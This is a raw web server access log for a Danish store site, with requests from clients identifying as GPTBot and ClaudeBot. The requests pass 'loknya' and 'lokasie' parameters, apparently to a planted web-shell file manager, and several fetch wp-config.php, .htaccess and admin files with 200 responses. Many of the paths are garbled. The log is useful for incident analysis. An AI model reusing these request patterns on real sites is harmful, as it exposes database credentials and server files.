74.7.227.174 - - [29/Jul/2026:08:37:16 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.k/././././lscache/a/a/ HTTP/2" 200 1789 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/././././lscache/a/a/d" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:16 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-ors.dk%2Flscache%2Ff%2F1 HTTP/2" 200 1778 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:16 +0200] "GET /?loknya=/vr/www/vhosts/store-bors.k/./lscche/ HTTP/2" 200 1759 "https://www.store-bors.dk/?loknya=/vr/www/vhosts/store-bors.k/./lscche/2/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:16 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-config.php&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs HTTP/2" 200 4598 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:16 +0200] "GET /privatlivspolitik/?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-content%2Flanguages%2Fplugins%2Fwordpress-seo-en_CA.mo&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-content%2Flanguages%2Fplugins HTTP/2" 200 17181 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:16 +0200] "GET /?loknya=/vr/www/vhosts/store-borsk/ HTTP/2" 200 1740 "https://www.store-bors.dk/?loknya=/vr/www/vhosts/store-bors.k/." "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:16 +0200] "GET /bep/m/kirlist1?loknya=%2Fvr%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscche%2Fc%2Fd%2F HTTP/2" 200 1773 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:16 +0200] "GET /index.php?loknya=/var/www/vhosts/store-ors.dk/././././lscache/e/a HTTP/2" 200 1789 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-ors.dk/././././lscache/e/a/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:17 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F%2Fhttpdocs%2Fwp-config.php&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F%2Fhttpdocs HTTP/2" 200 4601 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:17 +0200] "GET /privatlivspolitik/?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-content%2Fplugins%2Ffileorganizer%2Fmain%2Fpromo.php&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-content%2Fplugins%2Ffileorganizer%2Fmain HTTP/2" 200 3707 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:17 +0200] "GET /?loknya=/vr/www/vhosts/store-bors.dk/./lscche/b HTTP/2" 200 1770 "https://www.store-bors.dk/?loknya=/vr/www/vhosts/store-bors.dk/./lscche/b/1/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:17 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fb%2F2%2Fb HTTP/2" 200 2100 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:17 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvr%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscche%2F7%2F1 HTTP/2" 200 1769 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:17 +0200] "GET /index.php?loknya=/var/www/vhosts/store-ors.dk/././././lscache/a/a/ HTTP/2" 200 1791 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/././././lscache/a/a/b" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:37:18 +0200] "GET /?loknya=/vr/www/vhosts/store-orsdk/ HTTP/2" 200 1743 "https://www.store-bors.dk/?loknya=/vr/www/vhosts/store-ors.dk/." "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:17 +0200] "GET /privatlivspolitik/?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-content%2Fuploads%2Fuael_uploads%2F.htaccess&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-content%2Fuploads%2Fuael_uploads HTTP/2" 200 1656 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:18 +0200] "GET /privatlivspolitik/?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-content%2Flanguages%2Fplugins%2Felementor-pro-da_DK.mo&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-content%2Flanguages%2Fplugins HTTP/2" 200 37706 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:18 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/././././lsahe/e/e HTTP/2" 200 1785 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/././././lsahe/e/e/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:18 +0200] "GET /privatlivspolitik/?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2F%2Fcredits.php&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2F HTTP/2" 200 2932 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:18 +0200] "GET /?loknya=/var/www/vhosts/stor-bors.dk/./lsah/8 HTTP/2" 200 1773 "https://www.store-bors.dk/?loknya=/var/www/vhosts/stor-bors.dk/./lsah/8/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:18 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fe%2Fb%2Fa HTTP/2" 200 1995 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:18 +0200] "GET /index.php?loknya=/var/www/vhosts/stor-bors.dk/././././lsah HTTP/2" 200 1785 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/stor-bors.dk/././././lsah/a/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:18 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F8%2Ff%2Fb HTTP/2" 200 2050 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:19 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fb%2Fd%2Fb HTTP/2" 200 2054 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:19 +0200] "GET /?loknya=/var/www/vhosts/stor-bors.dk/./lsah HTTP/2" 200 1766 "https://www.store-bors.dk/?loknya=/var/www/vhosts/stor-bors.dk/./lsah/8/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:37:19 +0200] "GET /index.php?loknya=/var/www/vhosts/store-ors.dk/././././lsahe/ HTTP/2" 200 1775 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/././././lsahe/b" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:19 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fd%2Fb%2Fb HTTP/2" 200 2057 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:19 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F1%2Ff%2Fb HTTP/2" 200 2091 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:19 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F1%2Fb%2Ff HTTP/2" 200 1982 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:20 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F9%2Fd%2Fb HTTP/2" 200 1997 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:20 +0200] "GET /?loknya=/var/www/vhosts/stor-bors.dk/./lsah/ HTTP/2" 200 1763 "https://www.store-bors.dk/?loknya=/var/www/vhosts/stor-bors.dk/./lsah/8/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:37:20 +0200] "GET /index.php?loknya=/var/www/vhosts/store-ors.dk/././././lscache/d/a/ HTTP/2" 200 1791 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/././././lscache/d/a/b" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:20 +0200] "GET /bep/m/kirlist1?loknya=%2Fvr%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscche%2Fd%2F3%2F HTTP/2" 200 1770 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:20 +0200] "GET /privatlivspolitik/?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-content%2Fthemes%2Ftwentytwentyfive%2F HTTP/2" 200 2464 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:20 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F0%2Fb%2Ff HTTP/2" 200 1987 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:20 +0200] "GET /?loknya=/vr/www/vhosts/store-bors.k/./ HTTP/2" 200 1755 "https://www.store-bors.dk/?loknya=/vr/www/vhosts/store-bors.k/./lscche" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:37:20 +0200] "GET /index.php?loknya=/var/www/vhosts/store-ors.dk/././././lscache/d/d HTTP/2" 200 1787 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-ors.dk/././././lscache/d/d/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:20 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F8%2Fb%2F2 HTTP/2" 200 1980 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:21 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F1%2Fb%2F2 HTTP/2" 200 2075 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:21 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F0%2Ff%2Fb HTTP/2" 200 1993 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:22 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fd%2Fd%2Fa HTTP/2" 200 2049 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:22 +0200] "GET /?loknya=/vr/www/vhosts/store-ors.dk/./ HTTP/2" 200 1759 "https://www.store-bors.dk/?loknya=/vr/www/vhosts/store-ors.dk/./lscche" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:22 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flsahe%2Fa HTTP/2" 200 1772 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:22 +0200] "GET /index.php?loknya=/var/www/vhosts/store-ors.dk/././././lscache/c/c HTTP/2" 200 1784 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-ors.dk/././././lscache/c/c/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:22 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F0%2Fb%2F2 HTTP/2" 200 1987 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:22 +0200] "GET /?loknya=/vr/www/vhosts/store-bors.dk/./lscche/d HTTP/2" 200 1771 "https://www.store-bors.dk/?loknya=/vr/www/vhosts/store-bors.dk/./lscche/d/4/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:22 +0200] "GET /bep/m/kirlist1?loknya=%2Fvr%2Fwww%2Fvhosts%2Fstore-ors.dk%2Flscche%2F2%2F HTTP/2" 200 1765 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:22 +0200] "GET /index.php?loknya=/var/www/vhosts/stor-ors.dk/././././lscach/d HTTP/2" 200 1786 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/stor-ors.dk/././././lscach/d/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:22 +0200] "GET /privatlivspolitik/?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2F%2Fpost-new.php&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2F HTTP/2" 200 2605 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:23 +0200] "GET /privatlivspolitik/?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-content%2Fthemes%2Ftwentytwentyfive%2Fstyles%2Fsections HTTP/2" 200 2209 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:23 +0200] "GET /?loknya=/vr/www/vhosts/store-borsdk HTTP/2" 200 1740 "https://www.store-bors.dk/?loknya=/vr/www/vhosts/store-borsdk//" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:23 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flsahe%2F4%2F1 HTTP/2" 200 1768 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:23 +0200] "GET /index.php?loknya=/var/www/vhosts/store-ors.k/././././lscache/e/ HTTP/2" 200 1782 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.k/././././lscache/e/b/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:23 +0200] "GET /privatlivspolitik/?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2F%2Foptions-privacy.php&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2F HTTP/2" 200 4989 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:23 +0200] "GET /privatlivspolitik/?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2F%2Fmedia.php&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2F HTTP/2" 200 1918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:24 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F1%2F2%2Fb HTTP/2" 200 2044 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:24 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/9/e/a HTTP/2" 200 2004 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/9/e" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:37:24 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.k/././././lscache/a/a HTTP/2" 200 1783 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.k/././././lscache/a/a/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:24 +0200] "GET /privatlivspolitik/?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2F%2Fmedia-upload.php&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2F HTTP/2" 200 2998 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:24 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvr%2Fwww%2Fvhosts%2Fstore-bors.k%2Flscche%2F8 HTTP/2" 200 1761 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:24 +0200] "GET /?loknya=/vr/www/vhosts/store-borsk HTTP/2" 200 1740 "https://www.store-bors.dk/?loknya=/vr/www/vhosts/store-borsk/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:24 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flsahe%2F0%2F0 HTTP/2" 200 1767 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:24 +0200] "GET /index.php?loknya=/var/www/vhosts/store-ors.dk/././././lscache/e/e HTTP/2" 200 1783 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-ors.dk/././././lscache/e/e/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:25 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F5%2Fd%2Fb HTTP/2" 200 1998 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:25 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fabout.php&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs HTTP/2" 200 4526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:25 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/b/2/a HTTP/2" 200 2060 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/b/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:37:25 +0200] "GET /index.php?loknya=/vr/www/vhosts/store-ors.dk/././././lscche// HTTP/2" 200 1777 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-ors.dk/././././lscache/a/a/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:25 +0200] "GET /privatlivspolitik/?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2F%2Fnav-menus.php&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2F HTTP/2" 200 13511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:25 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F0%2F2%2Fb HTTP/2" 200 2000 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:25 +0200] "GET /?loknya=/vr/www/vhosts/store-orsdk HTTP/2" 200 1742 "https://www.store-bors.dk/?loknya=/vr/www/vhosts/store-orsdk/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:25 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-ors.dk%2Flscache%2F5%2F2 HTTP/2" 200 1779 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:25 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/././././lsahe/a/a HTTP/2" 200 1789 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/././././lsahe/a/a/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:26 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F4%2Fb HTTP/2" 200 2077 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:26 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/5/a/5 HTTP/2" 200 1983 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/5/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
